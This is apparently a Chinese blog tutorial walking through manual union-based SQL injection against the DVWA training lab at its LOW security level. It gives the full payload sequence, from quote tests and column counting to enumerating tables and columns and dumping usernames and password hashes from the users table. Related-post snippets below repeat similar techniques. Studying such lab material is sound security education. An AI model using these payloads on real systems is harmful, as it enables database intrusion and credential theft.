DVWAS中SQLl注入模块靶机实战(LOW等级)

最新推荐文章于 2024-07-04 16:30:00 发布
原创 最新推荐文章于 2024-07-04 16:30:00 发布 · 2.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #mysql #前端

本文通过具体步骤演示了如何发现并利用SQL注入漏洞,包括确定漏洞类型、获取数据库信息、读取表和字段名直至最终获取敏感数据。

1、首先判断漏洞的类型
(1)在搜索框中输入1,发现存在回显,得知不是盲注
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gtuN3nrG-1639397966693)(C:\Users\84305\AppData\Roaming\Typora\typora-user-images\image-20211213191602042.png)]
(2)分别输入1 and 1=1和1 and 1=2(嵌入sql语句),发现结果一致,得知不是整形注入
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KhirT4qR-1639397966693)(C:\Users\84305\AppData\Roaming\Typora\typora-user-images\image-20211213191754918.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4NJU4AE2-1639397966695)(C:\Users\84305\AppData\Roaming\Typora\typora-user-images\image-20211213191946637.png)]
(3)输入1’,发现报错
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zTxEMAei-1639397966696)(C:\Users\84305\AppData\Roaming\Typora\typora-user-images\image-20211213192755919.png)]

(4)检查是否是与单引号有关的字符型注入,分别输入1’ and ‘1’ ='1和1’ and ‘1’='2,发现第二个没有回显,得知是单引号字符型注入
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
(5)通过输入1' order by '数字' #爆字段数
注:#为注释符,可以把后面的语句给注释掉,也可以使用其它注释符代替,例如--+,但此处经过测试发现--+会被转译,导致不能使用
先后通过测试1和2都没有报错,当测试到3的时候报错了,说明字段数是2个
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KoFdqMKd-1639397966699)(C:\Users\84305\AppData\Roaming\Typora\typora-user-images\image-20211213194510264.png)]
在这里插入图片描述
(6)通过输入-1' union select 1,2 #判断回显位置
在这里插入图片描述
(7)通过输入-1' union select 1,database() #,得知数据库名字为dvwa
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AJI46c6J-1639397966700)(C:\Users\84305\AppData\Roaming\Typora\typora-user-images\image-20211213195051834.png)]
(8)通过输入-1' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() #,得知存在两个表,且表名分别为guestbookusers,到此可知users中有我们需要的东西
(在数据库中存在一个默认数据库information_schema.tables里面存有其他数据库的信息)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-blWtkGUb-1639397966701)(C:\Users\84305\AppData\Roaming\Typora\typora-user-images\image-20211213200005265.png)]
(9)通过输入-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #,得知字段名分别为user_idfirst_namelast_nameuserpasswordavataridusernamepasswordidunamepasswd
在这里插入图片描述
(10)通过输入-1' union select user,password from users limit 0,1 #,可以得知用户名和对应的密码,不过需要修改limit number,1中的number,逐一显示出来在这里插入图片描述

Johnny.G
关注
基于dvwa平台的手工sql注入(级别:low
奇怪的569的博客
10-13 976
首先进入dvwa平台的sql injection页面。 在user id中提交:1 此时在url中显示出了?id=1,数据库的信息显示到页面上了,有回显。 在url中提交id=1' 页面报错 将后面的语句通过--+注释掉,此时页面正常显示。 我们可以知道漏洞参数是:id 我们要进行的是 “字符型漏洞” 注入。 以上信息确定好后,我们可以进行联合查询。 首先使用orde...
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1591
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
dvwaSQL Injection
qq_17762247的博客
06-05 319
一、简介 SQL Injection是一种常见的注入攻击类型,其攻击方式是在客户端的输入数据中插入SQL命令,然后发送到服务端,服务端对数据进行解析,并执行一些非预期的操作。成功的SQL注入攻击能够从数据库中读取敏感数据、篡改数据库数据、对数据库执行管理员操作,甚至执行系统命令,从而造成整个系统被攻击者控制。 二、Low 1、服务器端代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST
DVWA sql注入low级别
LRainner的博客
09-18 1109
DVWA sql注入low级别 sql注入分类 数字型注入 SELECT first_name, last_name FROM users WHERE user_id = $id 字符型注入 SELECT first_name, last_name FROM users WHERE user_id = ‘$id’ 一般可以通过直接输入单引号来判断是否存在注入点 通过输入3和1+2判断注入为字符型注入,若为数字型注入,则3和1+2输出一样 字符型注入 字符型注入最关键的是如何闭合SQ
The used SELECT statements have a different number of columns???
weixin_30328063的博客
01-03 316
今天我们组就我一个人留守在这里修复bug了,有点小悲伤啊,他们都问我能不能hold得住啊,我当然能hold得住啊; 在看一个入库的存储过程中,在数据库运行的时候是没问题的,项目已启动,进行入库操作就是报错, The used SELECT statements have a different number of columns 顾名思义,就是你选择的列和你得到的列的烈数不一致,然后就去看存...
精选资源
vulnhub靶机实战-My-cmsms靶机
09-29
靶机实战中,主机发现是指通过各种技术手段来发现目标网络中的主机。常见的主机发现方法有arp-scan、nmap、ping扫描等。其中,arp-scan是一种基于ARP协议的主机发现工具,可以扫描局域网中的主机,得到其IP地址和...
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 1085
SQL注入getshell靶机实战
精选资源
C模块扫描靶机脚本,包含端口。
05-04
C模块扫描靶机脚本,很快基本20几秒,扫描后将靶机IP和端口存放在txt中,购买后私聊博主,给到教程。
sqli-labs-master-注入学习靶机
01-19
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能充分验证或过滤用户输入的情况下,导致恶意SQL代码被插入到数据库查询中。`sqli-labs-master-注入学习靶机` 提供了一个模拟环境,帮助学习者深入理解SQL注入...
网络安全基于SQL注入与SUID提权的靶机渗透技术:Nullbyte靶机信息搜集、漏洞利用与权限提升实战分析
最新发布
09-15
内容概要:本文是一份关于Nullbyte靶机的渗透测试报告,详细记录了从信息搜集、漏洞发现到获取系统权限的完整过程。通过Nmap扫描识别开放端口和服务,利用Gobuster进行目录爆破,结合ExifTool和strings提取图片隐藏...
DVWA指南
飞鱼的企鹅的博客
01-04 277
Brute Force 1.LOW级别 源代码 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the dat...
sql注入详解+docker靶场搭建举例
qq_56438857的博客
05-25 1742
sql详解,原创非复制,送给学弟学妹
完成DVWAlow等级SQL注入获得表名
m0_73496792的博客
07-04 440
然后链接到我们的phpstudy的数据库中,注意选择mysql,因为phpstudy里面的数据库是MYSQL类型的,输入自己的密码,链接名称可以随便写,密码是之前我们注册DVWA是弄的,我这边是改成了root。information_schema.tables是一个系统表,包含了当前数据库中所有表的信息。union操作符允许将两个结果集合并起来,所以攻击者可以将他们的查询结果插入到原始查询的结果中。便可以完成目标了,这就是一个简单的SQL注入,完成一些开发者没想到的操作。可以看到我们的日志已经成功打开了。
dvwa-sql注入
m0_64987233的博客
07-03 209
代码审计:SELECT first_name, last_name FROM users WHERE user_id = '$id'输入:1' union select user(),database()#输入1' and 1=2# 没有反应。发现查到3时报错了,说明只有两列。输入1' and 1=1#
网络安全-靶机dvwa之XSS注入Low到High详解(含代码分析)
关注网络安全、云原生安全
10-18 1万+
本篇文章,针对靶机dvwa(Damn Vulnerable Web Application)中的XSS(DOM)、XSS(Reflected)、XSS(Stored)LOW、MIDIUM、HIGH安全级别使用网络安全-js安全知识点与XSS常用payloads中提到的XSS注入payloads,使用手工进行XSS注入。并根据网络安全-php安全知识点对LOW、MIDIUM、HIGH、IMPOSSIBLE安全级别的代码进行解释。 目标:弹出窗口/获得cookie XSS(DOM)-LOW 正常 可
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1869
DVWAsql注入漏洞-low
SQL注入实战
qq_44915227的博客
04-17 2114
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
DVWA-SQL注入(SQL Injection)低/中/高级别
热门推荐
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL注入low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
SQL注入:union注入学习笔记整理
spongbob1的博客
11-22 2659
union注入即为用union联合查询来查询指定的数据,需要根据每一步的返回结果来判断和进行下一步操作。此仅为个人的学习笔记。 结构 联合查询的语句结构基本为: select a from b union select c from d where e; union会一次显示两个查询结果,使第一个查询语句作为正常内容,第二个作为查询语句来进行构造。 第一步:判断类型 数字型判断 共分3步判断步骤: 1.加单引号,如输入id=1’,对应的sql为:select * from table where id=1
新手入门:掌握Web渗透测试靶机实战技巧
新手应该从较为简单的靶机开始,逐步过渡到更复杂的情景中。 3. DVWA-master: DVWA(Damn Vulnerable Web Application)是一个旨在供安全研究者练习和学习渗透技术的平台。它包含了多种典型的Web应用程序安全漏洞...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值